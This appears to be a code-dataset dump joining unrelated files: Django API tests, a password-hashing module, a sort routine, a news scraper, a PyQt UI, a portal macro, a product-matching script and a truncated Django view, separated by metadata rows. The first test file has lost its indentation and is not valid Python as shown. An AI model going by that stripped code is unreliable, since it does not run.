# Mock the functionality of the IAM
# Simulates the translation of a token to an ID
# Used in the underlying GET method
mock_valid_token_to_id.return_value = 'TestService'
with self.settings(ALLOWED_FOR_GET='TestService'):
# Make (and check) the GET request
self._check_summary_get(400, options="?group=TestGroup",
authZ_header_cont="Bearer TestToken")
@patch.object(TokenChecker, 'valid_token_to_id')
def test_cloud_record_summary_get_403(self, mock_valid_token_to_id):
"""Test an unauthorized service cannot make a GET request."""
# Mock the functionality of the IAM
# Simulates the translation of a token to an unauthorized ID
# Used in the underlying GET method
mock_valid_token_to_id.return_value = 'FakeService'
with self.settings(ALLOWED_FOR_GET='TestService'):
# Make (and check) the GET request
self._check_summary_get(403,
options=("?group=TestGroup"
"&from=20000101&to=20191231"),
authZ_header_cont="Bearer TestToken")
def test_cloud_record_summary_get_401(self):
"""Test an unauthenticated GET request."""
# Test without the HTTP_AUTHORIZATION header
# Make (and check) the GET request
self._check_summary_get(401,
options=("?group=TestGroup"
"&from=20000101&to=20191231"))
# Test with a malformed HTTP_AUTHORIZATION header
# Make (and check) the GET request
self._check_summary_get(401,
options=("?group=TestGroup"
"&from=20000101&to=20191231"),
authZ_header_cont="TestToken")
@patch.object(TokenChecker, 'valid_token_to_id')
def test_cloud_record_summary_get_200(self, mock_valid_token_to_id):
"""Test a successful GET request."""
# Connect to database
database = self._connect_to_database()
# Clean up any lingering example data.
self._clear_database(database)
# Add example data
self._populate_database(database)
# Mock the functionality of the IAM
mock_valid_token_to_id.return_value = 'TestService'
expected_response = ('{'
'"count":2,'
'"next":null,'
'"previous":null,'
'"results":[{'
'"WallDuration":86399,'
'"Year":2016,'
'"Day":30,'
'"Month":7'
'},{'
'"WallDuration":43200,'
'"Year":2016,'
'"Day":31,'
'"Month":7}]}')
with self.settings(ALLOWED_FOR_GET='TestService',
RETURN_HEADERS=["WallDuration",
"Day",
"Month",
"Year"]):
try:
self._check_summary_get(200,
expected_response=expected_response,
options=("?group=TestGroup"
"&from=20000101&to=20191231"),
authZ_header_cont="Bearer TestToken")
finally:
# Clean up after test.
self._clear_database(database)
database.close()
def tearDown(self):
"""Delete any messages under QPATH and re-enable logging.INFO."""
logging.disable(logging.NOTSET)
def _check_summary_get(self, expected_status, expected_response=None,
options='', authZ_header_cont=None):
"""Helper method to make a GET request."""
test_client = Client()
# Form the URL to make the GET request to
url = ''.join((reverse('CloudRecordSummaryView'), options))
if authZ_header_cont is not None:
# If content for a HTTP_AUTHORIZATION has been provided,
# make the GET request with the appropriate header
response = test_client.get(url,
HTTP_AUTHORIZATION=authZ_header_cont)
else:
            # Otherwise, make a GET request without a HTTP_AUTHORIZATION header
response = test_client.get(url)
# Check the expected response code has been received.
self.assertEqual(response.status_code, expected_status)
if expected_response is not None:
# Check the response received is as expected.
self.assertEqual(response.content, expected_response)
def _populate_database(self, database):
"""Populate the database with example summaries."""
cursor = database.cursor()
# Insert example usage data
cursor.execute('INSERT INTO CloudRecords '
'(VMUUID, SiteID, GlobalUserNameID, VOID, '
'VOGroupID, VORoleID, Status, StartTime, '
'SuspendDuration, WallDuration, PublisherDNID, '
'CloudType, ImageId, '
'CloudComputeServiceID) '
'VALUES '
'("TEST-VM", 1, 1, 1, 1, 1, "Running", '
'"2016-07-30 00:00:00", 0, 86399, 1, "TEST", "1", '
'1);')
# Insert example usage data
cursor.execute('INSERT INTO CloudRecords '
'(VMUUID, SiteID, GlobalUserNameID, VOID, '
'VOGroupID, VORoleID, Status, StartTime, '
'SuspendDuration, WallDuration, PublisherDNID, '
'CloudType, ImageId, '
'CloudComputeServiceID) '
'VALUES '
'("TEST-VM", 1, 1, 1, 1, 1, "Running", '
'"2016-07-30 00:00:00", 0, 129599, 1, "TEST", "1", '
'1);')
# These INSERT statements are needed
# because we query VCloudSummaries
cursor.execute('INSERT INTO Sites VALUES (1, "TestSite");')
cursor.execute('INSERT INTO VOs VALUES (1, "TestVO");')
cursor.execute('INSERT INTO VOGroups VALUES (1, "TestGroup");')
cursor.execute('INSERT INTO VORoles VALUES (1, "TestRole");')
cursor.execute('INSERT INTO DNs VALUES (1, "TestDN");')
cursor.execute('INSERT INTO CloudComputeServices '
'VALUES (1, "TestService");')
# Summarise example usage data
cursor.execute('CALL SummariseVMs();')
database.commit()
def _clear_database(self, database):
"""Clear the database of example data."""
cursor = database.cursor()
cursor.execute('DELETE FROM CloudRecords '
'WHERE VMUUID="TEST-VM";')
cursor.execute('DELETE FROM CloudSummaries '
'WHERE CloudType="TEST";')
cursor.execute('DELETE FROM Sites '
'WHERE id=1;')
cursor.execute('DELETE FROM VOs '
'WHERE id=1;')
cursor.execute('DELETE FROM VOGroups '
'WHERE id=1;')
cursor.execute('DELETE FROM VORoles '
'WHERE id=1;')
cursor.execute('DELETE FROM DNs '
'WHERE id=1;')
cursor.execute('DELETE FROM CloudComputeServices '
'WHERE id=1;')
database.commit()
def _connect_to_database(self,
host='localhost',
user='root',
password='',
name='apel_rest'):
"""Connect to and return a cursor to the given database."""
database = MySQLdb.connect(host, user, password, name)
return database
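# Illustrative request shape exercised by these tests (all values are test
# fixtures; the URL path is resolved via reverse('CloudRecordSummaryView')):
#
#   GET <summary-endpoint>?group=TestGroup&from=20000101&to=20191231
#   Authorization: Bearer TestToken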
|
apache-2.0
| -8,940,463,494,486,466,000
| 40.817021
| 79
| 0.51908
| false
| 4.681753
| true
| false
| false
|
berkmancenter/mediacloud
|
apps/webapp-api/src/python/webapp/auth/password.py
|
1
|
5455
|
import base64
import hashlib
import os
from mediawords.db import DatabaseHandler
from mediawords.util.log import create_logger
from mediawords.util.perl import decode_object_from_bytes_if_needed
__HASH_SALT_PREFIX = "{SSHA256}"
__HASH_LENGTH = 64 # SHA-256 hash length
__SALT_LENGTH = 64
__MIN_PASSWORD_LENGTH = 8
__MAX_PASSWORD_LENGTH = 120
log = create_logger(__name__)
class McAuthPasswordException(Exception):
"""Password-related exceptions."""
pass
def password_hash_is_valid(password_hash: str, password: str) -> bool:
"""Validate a password / password token.
Ported from Crypt::SaltedHash: https://metacpan.org/pod/Crypt::SaltedHash
"""
password_hash = decode_object_from_bytes_if_needed(password_hash)
password = decode_object_from_bytes_if_needed(password)
if not password_hash:
raise McAuthPasswordException("Password hash is None or empty.")
if password is None:
raise McAuthPasswordException("Password is None.")
# Password can be an empty string but that would be weird so we only spit out a warning
if not password:
log.warning("Password is empty.")
if not password_hash.startswith(__HASH_SALT_PREFIX):
raise McAuthPasswordException("Password hash does not start with an expected prefix.")
if len(password_hash) != len(__HASH_SALT_PREFIX) + __HASH_LENGTH + __SALT_LENGTH:
raise McAuthPasswordException("Password hash is of the incorrect length.")
try:
password = password.encode('utf-8', errors='replace') # to concatenate with 'bytes' salt later
password_hash = password_hash[len(__HASH_SALT_PREFIX):]
salted_hash_salt = base64.b64decode(password_hash)
salt = salted_hash_salt[-1 * __SALT_LENGTH:]
expected_salted_hash = salted_hash_salt[:len(salted_hash_salt) - __SALT_LENGTH]
actual_password_salt = password + salt
sha256 = hashlib.sha256()
sha256.update(actual_password_salt)
actual_salted_hash = sha256.digest()
if expected_salted_hash == actual_salted_hash:
return True
else:
return False
except Exception as ex:
log.warning("Failed to validate hash: %s" % str(ex))
return False
def generate_secure_hash(password: str) -> str:
"""Hash a secure hash (password / password reset token) with a random salt.
Ported from Crypt::SaltedHash: https://metacpan.org/pod/Crypt::SaltedHash
"""
password = decode_object_from_bytes_if_needed(password)
if password is None:
raise McAuthPasswordException("Password is None.")
# Password can be an empty string but that would be weird so we only spit out a warning
if not password:
log.warning("Password is empty.")
password = password.encode('utf-8', errors='replace') # to concatenate with 'bytes' salt later
# os.urandom() is supposed to be crypto-secure
salt = os.urandom(__SALT_LENGTH)
password_salt = password + salt
sha256 = hashlib.sha256()
sha256.update(password_salt)
salted_hash = sha256.digest()
salted_hash_salt = salted_hash + salt
base64_salted_hash = base64.b64encode(salted_hash_salt).decode('ascii')
return __HASH_SALT_PREFIX + base64_salted_hash
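# Minimal round-trip sketch (illustrative only):
#
#     hashed = generate_secure_hash('correct horse battery staple')
#     assert password_hash_is_valid(hashed, 'correct horse battery staple')
#     assert not password_hash_is_valid(hashed, 'wrong password')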
def password_reset_token_is_valid(db: DatabaseHandler, email: str, password_reset_token: str) -> bool:
"""Validate password reset token (used for both user activation and password reset)."""
email = decode_object_from_bytes_if_needed(email)
password_reset_token = decode_object_from_bytes_if_needed(password_reset_token)
if not (email and password_reset_token):
log.error("Email and / or password reset token is empty.")
return False
# Fetch readonly information about the user
password_reset_token_hash = db.query("""
SELECT auth_users_id,
email,
password_reset_token_hash
FROM auth_users
WHERE email = %(email)s
LIMIT 1
""", {'email': email}).hash()
if password_reset_token_hash is None or 'auth_users_id' not in password_reset_token_hash:
log.error("Unable to find user %s in the database." % email)
return False
password_reset_token_hash = password_reset_token_hash['password_reset_token_hash']
if password_hash_is_valid(password_hash=password_reset_token_hash, password=password_reset_token):
return True
else:
return False
def validate_new_password(email: str, password: str, password_repeat: str) -> str:
"""Check if password complies with strength the requirements.
Returns empty string on valid password, error message on invalid password."""
email = decode_object_from_bytes_if_needed(email)
password = decode_object_from_bytes_if_needed(password)
password_repeat = decode_object_from_bytes_if_needed(password_repeat)
if not email:
return 'Email address is empty.'
if not (password and password_repeat):
return 'To set the password, please repeat the new password twice.'
if password != password_repeat:
return 'Passwords do not match.'
if len(password) < __MIN_PASSWORD_LENGTH or len(password) > __MAX_PASSWORD_LENGTH:
return 'Password must be between %d and %d characters length.' % (__MIN_PASSWORD_LENGTH, __MAX_PASSWORD_LENGTH,)
if password == email:
return "New password is your email address; don't cheat!"
return ''
|
agpl-3.0
| 8,678,888,388,578,591,000
| 32.67284
| 120
| 0.67846
| false
| 3.841549
| false
| false
| false
|
jakubtyniecki/pact
|
sort/hybrid.py
|
1
|
2447
|
""" hybrid sort module """
from sort.framework import validate
THRESHOLD = 10  # threshold below which we fall back to insert sort
@validate
def sort(arr):
""" hybrid sort """
hybridsort(arr, 0, len(arr) - 1)
return arr
def hybridsort(arr, first, last):
""" hybrid sort """
stack = []
stack.append((first, last))
while stack:
pos = stack.pop()
left, right = pos[0], pos[1]
if right - left < THRESHOLD:
""" if array is smaller then given threshold
use insert sort as it'll be more efficient """
insertsort(arr, left, right)
else:
piv = partition(arr, left, right)
if piv - 1 > left:
stack.append((left, piv - 1))
if piv + 1 < right:
stack.append((piv + 1, right))
def insertsort(arr, first, last):
""" insert sort """
assert first <= len(arr) and last < len(arr), \
"first: {}, last: {}".format(first, last)
for i in range(first, last + 1):
position, currentvalue = i, arr[i]
        while position > first and arr[position - 1] > currentvalue:
arr[position] = arr[position - 1]
position -= 1
arr[position] = currentvalue
def partition(arr, first, last):
""" partition """
assert first < len(arr) and last < len(arr) and first < last, \
"first: {}, last: {}".format(first, last)
pivotindex = pivotpoint(arr, first, last)
if pivotindex > first:
arr[first], arr[pivotindex] = arr[pivotindex], arr[first]
pivotvalue = arr[first]
left, right = first + 1, last
while right >= left:
while left <= right and arr[left] <= pivotvalue:
left += 1
while arr[right] >= pivotvalue and right >= left:
right -= 1
assert right >= 0 and left <= len(arr)
if right > left:
arr[left], arr[right] = arr[right], arr[left]
if right > first:
arr[first], arr[right] = arr[right], arr[first]
return right
def pivotpoint(arr, first, last):
""" pivot point strategy
using median of first, mid and last elements
to prevent worst case scenario """
    mid = first + ((last - first) >> 1)
if (arr[first] - arr[mid]) * (arr[last] - arr[first]) >= 0:
return first
elif (arr[mid] - arr[first]) * (arr[last] - arr[mid]) >= 0:
return mid
else:
return last
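# Minimal usage sketch (illustrative only; `sort` validates and sorts in place):
#
#     import random
#     data = [random.randint(0, 999) for _ in range(100)]
#     expected = sorted(data)
#     assert sort(data) == expected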
|
mit
| 7,002,549,922,402,661,000
| 23.969388
| 67
| 0.548018
| false
| 3.74732
| false
| false
| false
|
xuludev/CVLH_tutorial
|
netease_spider.py
|
1
|
3334
|
import json
import time
import os
import re
import requests
from bs4 import BeautifulSoup
import chardet
"""
url_list = [
'http://tech.163.com/special/00097UHL/tech_datalist_02.js?callback=data_callback',
'http://ent.163.com/special/000380VU/newsdata_index_02.js?callback=data_callback',
'http://sports.163.com/special/000587PR/newsdata_n_index_02.js?callback=data_callback',
'http://money.163.com/special/002557S5/newsdata_idx_index.js?callback=data_callback',
'http://edu.163.com/special/002987KB/newsdata_edu_hot_02.js?callback=data_callback'
]
"""
def crawl(pn):
headers = {
'Accept': '*/*',
'Connection': 'keep-alive',
'Host': 'ent.163.com',
'Referer': 'http://ent.163.com/',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'
}
request_url = 'http://ent.163.com/special/000380VU/newsdata_index_0' + str(pn) + '.js?callback=data_callback'
# print('is crawling page ' + request_url + '......')
response = requests.get(request_url, headers=headers)
if response.status_code == 200:
page_encoding = chardet.detect(response.content)['encoding']
        temp_str = response.text.replace('data_callback(', '', 1)
        # temp_str = response.content.decode(page_encoding).replace('data_callback(', '')
        temp_str = temp_str.rstrip()[:-1]  # drop only the trailing ')' of the JSONP wrapper
for each_news in json.loads(temp_str):
print(each_news['docurl'])
download_news_content(each_news['title'], each_news['docurl'])
elif response.status_code == 404:
raise Exception('No Page Found! ' + request_url)
else:
print('ERROR! ' + str(response.status_code))
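# Note: string surgery on the JSONP wrapper is fragile. A more robust helper is
# sketched below; it is illustrative only and not used by the original code.
def strip_jsonp(text, callback='data_callback'):
    """Return the JSON payload wrapped in callback( ... ), or text unchanged."""
    match = re.match(r'\s*%s\s*\((.*)\)\s*;?\s*$' % re.escape(callback), text, re.S)
    return match.group(1) if match else text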
def download_news_content(title, news_url):
if news_url.startswith('http://v'):
print('This page contains video ...')
else:
# r_content = re.compile('<img \w')
        r_title = re.compile(r'[?":\s/·]')
file_dir = 'd:/网易新闻/娱乐'
if not os.path.exists(file_dir) or not os.path.isdir(file_dir):
os.makedirs(file_dir)
headers = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'
}
response = requests.get(news_url, headers=headers)
if response.status_code == 200:
soup = BeautifulSoup(response.text, 'html5lib')
if response.url.startswith('http://digi.163.com') or response.url.startswith('http://tech.163.com') or response.url.startswith('http://ent.163.com'):
text_soup = soup.select('#endText')[0]
content_text = text_soup.get_text()
elif response.url.startswith('http://dy.163.com'):
text_soup = soup.select('#content')[0]
content_text = text_soup.get_text()
            elif response.url.startswith('http://mobile.163.com'):
                text_soup = soup.select('#epContentLeft')[0]
                content_text = text_soup.get_text()
            else:
                # fallback so content_text is always defined before writing below
                content_text = soup.get_text()
with open(file_dir + os.path.sep + re.sub(r_title, '', title, count=0) + '.txt', mode='wt', encoding='utf-8') as f:
f.write(content_text)
f.flush()
f.close()
print(title + '.txt has been written done!')
if __name__ == '__main__':
for i in range(2, 10, 1):
crawl(i)
time.sleep(5)
|
apache-2.0
| -1,926,016,843,630,203,600
| 34.855556
| 152
| 0.653092
| false
| 2.785714
| false
| false
| false
|
mdavidsaver/spicetools
|
spicetools/view/mainwin_ui.py
|
1
|
8609
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'spicetools/view/mainwin.ui'
#
# Created: Sun Apr 27 13:13:01 2014
# by: PyQt4 UI code generator 4.9.3
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(746, 516)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/icon.svg")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
MainWindow.setWindowIcon(icon)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.horizontalLayout_3 = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.label_3 = QtGui.QLabel(self.centralwidget)
self.label_3.setAlignment(QtCore.Qt.AlignCenter)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.verticalLayout.addWidget(self.label_3)
self.sets = QtGui.QComboBox(self.centralwidget)
self.sets.setObjectName(_fromUtf8("sets"))
self.verticalLayout.addWidget(self.sets)
self.label_2 = QtGui.QLabel(self.centralwidget)
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout.addWidget(self.label_2)
self.xaxis = QtGui.QComboBox(self.centralwidget)
self.xaxis.setObjectName(_fromUtf8("xaxis"))
self.verticalLayout.addWidget(self.xaxis)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label_4 = QtGui.QLabel(self.centralwidget)
self.label_4.setAlignment(QtCore.Qt.AlignCenter)
self.label_4.setObjectName(_fromUtf8("label_4"))
self.horizontalLayout.addWidget(self.label_4)
self.ops = QtGui.QComboBox(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(1)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.ops.sizePolicy().hasHeightForWidth())
self.ops.setSizePolicy(sizePolicy)
self.ops.setObjectName(_fromUtf8("ops"))
self.horizontalLayout.addWidget(self.ops)
self.verticalLayout.addLayout(self.horizontalLayout)
self.label = QtGui.QLabel(self.centralwidget)
self.label.setAlignment(QtCore.Qt.AlignCenter)
self.label.setObjectName(_fromUtf8("label"))
self.verticalLayout.addWidget(self.label)
self.signals = QtGui.QListWidget(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Preferred, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.signals.sizePolicy().hasHeightForWidth())
self.signals.setSizePolicy(sizePolicy)
self.signals.setSelectionMode(QtGui.QAbstractItemView.MultiSelection)
self.signals.setObjectName(_fromUtf8("signals"))
self.verticalLayout.addWidget(self.signals)
self.horizontalLayout_3.addLayout(self.verticalLayout)
self.canvas = PlotArea(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.canvas.sizePolicy().hasHeightForWidth())
self.canvas.setSizePolicy(sizePolicy)
self.canvas.setObjectName(_fromUtf8("canvas"))
self.horizontalLayout_3.addWidget(self.canvas)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 746, 20))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menu_File = QtGui.QMenu(self.menubar)
self.menu_File.setObjectName(_fromUtf8("menu_File"))
self.menuAbout = QtGui.QMenu(self.menubar)
self.menuAbout.setObjectName(_fromUtf8("menuAbout"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.actionOpen = QtGui.QAction(MainWindow)
self.actionOpen.setObjectName(_fromUtf8("actionOpen"))
self.actionE_xit = QtGui.QAction(MainWindow)
self.actionE_xit.setMenuRole(QtGui.QAction.QuitRole)
self.actionE_xit.setObjectName(_fromUtf8("actionE_xit"))
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.actionAboutQt = QtGui.QAction(MainWindow)
self.actionAboutQt.setObjectName(_fromUtf8("actionAboutQt"))
self.actionClose = QtGui.QAction(MainWindow)
self.actionClose.setObjectName(_fromUtf8("actionClose"))
self.actionReload = QtGui.QAction(MainWindow)
self.actionReload.setObjectName(_fromUtf8("actionReload"))
self.actionCloneWindow = QtGui.QAction(MainWindow)
self.actionCloneWindow.setObjectName(_fromUtf8("actionCloneWindow"))
self.menu_File.addAction(self.actionCloneWindow)
self.menu_File.addAction(self.actionOpen)
self.menu_File.addAction(self.actionReload)
self.menu_File.addAction(self.actionClose)
self.menu_File.addSeparator()
self.menu_File.addAction(self.actionE_xit)
self.menuAbout.addAction(self.actionAbout)
self.menuAbout.addAction(self.actionAboutQt)
self.menubar.addAction(self.menu_File.menuAction())
self.menubar.addAction(self.menuAbout.menuAction())
self.retranslateUi(MainWindow)
QtCore.QObject.connect(self.actionE_xit, QtCore.SIGNAL(_fromUtf8("triggered()")), MainWindow.close)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "SpiceView", None, QtGui.QApplication.UnicodeUTF8))
self.label_3.setText(QtGui.QApplication.translate("MainWindow", "Vector Set", None, QtGui.QApplication.UnicodeUTF8))
self.label_2.setText(QtGui.QApplication.translate("MainWindow", "X Vector", None, QtGui.QApplication.UnicodeUTF8))
self.label_4.setText(QtGui.QApplication.translate("MainWindow", "Op:", None, QtGui.QApplication.UnicodeUTF8))
self.label.setText(QtGui.QApplication.translate("MainWindow", "Y Vector(s)", None, QtGui.QApplication.UnicodeUTF8))
self.signals.setSortingEnabled(True)
self.menu_File.setTitle(QtGui.QApplication.translate("MainWindow", "&File", None, QtGui.QApplication.UnicodeUTF8))
self.menuAbout.setTitle(QtGui.QApplication.translate("MainWindow", "&Help", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpen.setText(QtGui.QApplication.translate("MainWindow", "&Open", None, QtGui.QApplication.UnicodeUTF8))
self.actionOpen.setShortcut(QtGui.QApplication.translate("MainWindow", "Ctrl+O", None, QtGui.QApplication.UnicodeUTF8))
self.actionE_xit.setText(QtGui.QApplication.translate("MainWindow", "E&xit", None, QtGui.QApplication.UnicodeUTF8))
self.actionE_xit.setShortcut(QtGui.QApplication.translate("MainWindow", "Ctrl+Q", None, QtGui.QApplication.UnicodeUTF8))
self.actionAbout.setText(QtGui.QApplication.translate("MainWindow", "About", None, QtGui.QApplication.UnicodeUTF8))
self.actionAboutQt.setText(QtGui.QApplication.translate("MainWindow", "About Qt", None, QtGui.QApplication.UnicodeUTF8))
self.actionClose.setText(QtGui.QApplication.translate("MainWindow", "&Close", None, QtGui.QApplication.UnicodeUTF8))
self.actionReload.setText(QtGui.QApplication.translate("MainWindow", "&Reload", None, QtGui.QApplication.UnicodeUTF8))
self.actionReload.setShortcut(QtGui.QApplication.translate("MainWindow", "Ctrl+R", None, QtGui.QApplication.UnicodeUTF8))
self.actionCloneWindow.setText(QtGui.QApplication.translate("MainWindow", "Clone Wi&ndow", None, QtGui.QApplication.UnicodeUTF8))
from .plotarea import PlotArea
from . import viewer_rc
|
gpl-3.0
| 8,151,757,473,375,844,000
| 58.784722
| 137
| 0.724707
| false
| 4.043682
| false
| false
| false
|
Jumpscale/jumpscale_portal8
|
apps/portalbase/macros/page/action/3_action.py
|
1
|
1083
|
def main(j, args, params, tags, tasklet):
page = args.page
data = {'action': args.getTag('id'),
'class': args.getTag('class') or '',
'deleterow': args.getTag('deleterow') or 'false',
'label': args.getTag('label') or '',
}
extradata = {}
tags = j.data.tags.getObject(args.cmdstr, None)
for tagname, tagvalue in tags.getDict().items():
if tagname.startswith('data-'):
extradata[tagname[5:]] = tagvalue
data['data'] = j.data.serializer.json.dumps(extradata)
if data['class']:
data['label'] = "<span class='%(class)s'></span> %(label)s" % data
element = "<a class='js_action'" \
" data-action='%(action)s'" \
" data-extradata='%(data)s'" \
" data-deleterow='%(deleterow)s'" \
"href='javascript:void(0);'>%(label)s</a>" % data
page.addMessage(element)
page.addJS('/system/.files/js/action.js', header=False)
params.result = page
return params
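# Illustrative example (assumed macro tags, not taken from a real page):
# a call like {{action id:user.delete class:fa-trash label:Delete data-uid:42}}
# renders an element similar to:
# <a class='js_action' data-action='user.delete' data-extradata='{"uid": "42"}'
#    data-deleterow='false' href='javascript:void(0);'>
#    <span class='fa-trash'></span> Delete</a>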
def match(j, args, params, tags, tasklet):
return True
|
apache-2.0
| 6,079,685,514,749,661,000
| 32.84375
| 74
| 0.554017
| false
| 3.493548
| false
| false
| false
|
volnrok/sortable-challenge
|
main.py
|
1
|
3683
|
import json
import random
import re
from check import check_match
from encoder import Encoder
from listing import Listing
from product import Product
# We'll sort products by manufacturer first
man_lookup = {}
# List of common manufacturer aliases
aliases = {
'agfaphoto': 'agfa',
'fuji': 'fujifilm',
'hewlett': 'hp',
'konica': 'konica minolta',
'sigmatek': 'sigma'
}
with open('products.txt', encoding='utf-8') as file:
for j in file:
product = Product(j)
man = product.manufacturer.lower()
# New manufacturer
if man not in man_lookup:
man_lookup[man] = []
# Enter product into data store
man_lookup[man].append(product)
with open('listings.txt', encoding='utf-8') as file:
mcount = 0
lcount = 0
man_cutoff = 3 # Only check the first few words for manufacturer matches
    word_pattern = re.compile(r'\w+')
for j in file:
listing = Listing(j)
man = listing.manufacturer.lower()
if man not in man_lookup:
if man in aliases:
# First look for manufacturer aliases match
man = aliases[man]
else:
i = 0
# Try to find a manufacturer match, look for words in the listing title
for match in word_pattern.finditer(listing.title):
match_str = match.group(0).lower()
if match_str in aliases:
man = aliases[match_str]
break
if match_str in man_lookup:
man = match_str
break
i += 1
# Actual product matches (vs accessories) will have a manufacturer match in the first few words
if i >= man_cutoff:
break
if man in man_lookup:
model_matches = []
family_matches = []
for product in man_lookup[man]:
match = check_match(product, listing)
# Don't count model matches with single-character models
if match['m_match'] and len(product.model) > 1:
model_matches.append((product, match['m_index']))
if match['f_match'] >= 2:
family_matches.append((product, match['m_index']))
matched = False
if len(model_matches) == 1:
matched = model_matches[0]
elif len(family_matches) == 1:
matched = family_matches[0]
if matched:
# If the manufacturer is present in the title multiple times, check that the product model happens before the second
i = 0
second_index = 0
for man_match in re.finditer(man, listing.title, re.IGNORECASE):
i += 1
if i >= 2:
second_index = man_match.start(0)
break
if i >= 2 and second_index < matched[1]:
pass
else:
mcount += 1
matched[0].matches.append(listing)
lcount += 1
if lcount % 1000 == 0:
print('.', end='')
print()
print(lcount, 'listings read,', mcount, 'matches found')
with open('matches.txt', mode='w', encoding='utf-8') as file:
for man in man_lookup:
for product in man_lookup[man]:
if len(product.matches):
file.write(json.dumps(product, cls=Encoder, ensure_ascii=False))
file.write('\n')
print('Results saved to matches.txt')
|
mit
| -3,413,363,037,030,869,000
| 31.307018
| 132
| 0.519685
| false
| 4.38975
| false
| false
| false
|
Jorgesolis1989/SIVORE
|
corporaciones/views.py
|
1
|
11935
|
from django.shortcuts import render_to_response
from django.shortcuts import render ,redirect
from django.template.context import RequestContext
from corporaciones.models import Corporacion , Sede
from django.contrib.auth.decorators import permission_required
from corporaciones.forms import FormularioRegistroCorporacion, FormularioEditarCorporacion , FormularioCargar
from votantes.models import Votante
from planchas.models import Plancha
from candidatos.models import Candidato
from usuarios.models import Usuario
from django.db.models import Q
import csv
# -*- coding: utf-8 -*-
from io import StringIO
@permission_required("usuarios.Administrador" , login_url="/")
def registro_corporacion(request):
mensaje = ""
if request.method == 'POST' and "btncreate" in request.POST:
form = FormularioRegistroCorporacion(request.POST)
form2 = FormularioCargar(request.POST , request.FILES)
        #If the form is valid and has data
if form.is_valid():
            #Capture the corporation id
id_corporation = form.cleaned_data["id_corporation"]
sede = form.cleaned_data["sede"]
            #Query the corporation in the database.
try:
corporacion = Corporacion.objects.get(id_corporation=id_corporation , sede=sede)
except Corporacion.DoesNotExist:
corporacion = Corporacion()
corporacion_create(corporacion, form)
llamarMensaje = "exito_corporacion"
if form.cleaned_data["facultad"] is None or form.cleaned_data["sede"] is None:
mensaje = "La corporacion "+ str(id_corporation) +" se guardo correctamente"
else:
mensaje = "La corporacion "+ str(id_corporation) +" sede "+str(sede.nombre_sede)+" se guardo correctamente"
else:
if not corporacion.is_active:
corporacion_create(corporacion, form)
llamarMensaje = "exito_corporacion"
mensaje = "La corporación "+ str(id_corporation) +" se guardo correctamente"
else:
llamarMensaje = "fracaso_corporacion"
mensaje = "La corporacion "+ str(corporacion) + " ya esta registrada"
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
else:
form = FormularioRegistroCorporacion()
data = {
'form': form,
}
return render_to_response('registro_corporacion.html', data, context_instance=RequestContext(request))
elif request.method == 'POST' and "btnload" in request.POST:
form = FormularioRegistroCorporacion()
form2 = FormularioCargar(request.POST , request.FILES)
        #If the form is valid and has data
if form2.is_valid():
try:
csvf = StringIO(request.FILES['file'].read().decode('ISO-8859-3'))
except Exception as e:
llamarMensaje = "fracaso_corporacion"
mensaje = "Error en el formato del archivo de entrada"
request.session['llamarMensaje'] = llamarMensaje
request.session['mensaje'] = mensaje
return redirect("listar_corporacion")
reader = csv.reader(csvf, delimiter=';')
line=0
counter= 0
            # Check that the campus (sede) records exist, and create them if needed.
diccionarioSedes= {'CALI':'0', 'BUGA':'1', 'CAICEDONIA':'2', 'CARTAGO':'3', 'PACIFICO':'4',
'PALMIRA':'5','TULUA':'6', 'ZARZAL':'7', 'YUMBO':'14',
'SANTANDER DE QUILICHAO':'21'}
